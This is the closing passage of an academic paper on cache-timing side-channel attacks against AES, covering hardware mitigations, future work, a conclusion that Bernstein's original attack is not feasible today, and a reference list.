Hardware mitigations: Obviously, the best hardware mitigation would be to stop using a cache altogether, but this would cause severe performance degradation for all applications and is not a viable option. This area is very new, and no one has verified this type of attack against hardware implementations; however, countermeasures against conventional side channel attacks are a good starting point when implementing ciphers in hardware. In a recent paper, Page [11] proposes a new cache architecture which partitions the cache, removing it as a shared resource and preventing data from being forcibly flushed from it. Cryptographic co-processors are another interesting idea, explained in [1]; however, as mentioned there, not a lot of information is available on this aspect.

VI. FUTURE WORK

The original attack proposed by Bernstein is not a good proposition on present architectures or for network-based attacks, so it would be worthwhile to extend the attack and verify such extensions experimentally. The following items may be of interest to researchers for future work in this field:

• Extracting a larger key
• Verifying newer attacks which are extensions of these attacks
• Verifying the attack on other implementations of the algorithm
• Correlation improvements
• Brute-force key search improvements
• Verification of mitigation techniques

In [2], the authors have proposed an extension of Bernstein's attack which requires far fewer packets and, in turn, less time. They provide the complete source code, which can be used for replicating such attacks.

VII. CONCLUSION

The cache timing attack described by Bernstein was re-verified, unsuccessfully, by attacking with three computers in parallel and on the Pentium M architecture. The methodology adopted in [1] was reused to determine the number of packets that need to be sent to extract the key. The attacks did not succeed, owing to several factors: mitigation of the attack in newer versions of OpenSSL, and the larger cache sizes of newer processors, which require a much greater number of packets to average out the noise. The math behind profiling with a non-zero key was discussed, and such profiling was carried out for one packet size. The real-world feasibility of the attack was discussed, and it was concluded that the Bernstein attack in its original form is not feasible in the current real-world situation.

Newer and improved versions of this attack have been described in recent papers and will be very useful for further study in this field. In addition, several items of interest to researchers seeking advances in this area have been listed. This work has brought to light several developments in the field of side channel cryptanalysis which can serve as a guide to future work.

REFERENCES

[1] Robert G. Salembier, "Analysis of Cache Timing Attacks against AES", manuscript received May 12, 2006. http://ece.gmu.edu/courses/ECE746/project/F06_Project_resources/Salembier_Cache_ming_Attack.pdf
[2] Joseph Bonneau and Ilya Mironov, "Cache-Collision Timing Attacks Against AES". http://www.stanford.edu/~jbonneau/AES_timing.pdf
[3] Michael Neve, Jean-Pierre Seifert and Zhenghong Wang, "Cache time-behavior analysis on AES". http://www.cryptologie.be/document/Publications/AsiaCCS_full_06.pdf
[4] Daniel J. Bernstein, "Cache-timing attacks on AES", November 12, 2004. http://cr.yp.to/antiforgery/cachetiming-20050414.pdf
[5] Daniel J. Bernstein, "Cache-timing attacks on AES", April 14, 2005. http://cr.yp.to/antiforgery/cachetiming-20050414.pdf
[6] Joseph Bonneau and Ilya Mironov, "Cache-Collision Timing Attacks Against AES", Cryptographic Hardware and Embedded Systems (CHES 2006), pp. 201-215, 2006.
[7] Dag Arne Osvik, Adi Shamir and Eran Tromer, "Cache Attacks and Countermeasures: the Case of AES" (extended version), revised November 20, 2005. http://www.wisdom.weizmann.ac.il/~tromer/papers/cache.pdf
[8] Mairéad O'Hanlon and Anthony Tonge, "Investigation of Cache-Timing Attacks on AES", Working Papers for 2005. http://computing.dcu.ie/research/papers/2005/0105.pdf
[9] E. English and S. Hamilton, "Network security under siege: the timing attack", IEEE Computer, vol. 29, pp. 95-97, March 1996.
[10] Michael Neve, Jean-Pierre Seifert and Zhenghong Wang, "A refined look at Bernstein's AES side-channel analysis", fast abstract in Proceedings of the 2006 ACM Symposium on Information, Computer and Communications Security (AsiaCCS).
[11] OpenSSL toolkit. http://www.openssl.org/
[12] D. Page, "Partitioned Cache Architecture as a Side-Channel Defence Mechanism", 2005. http://eprint.iacr.org/2005/280.pdf
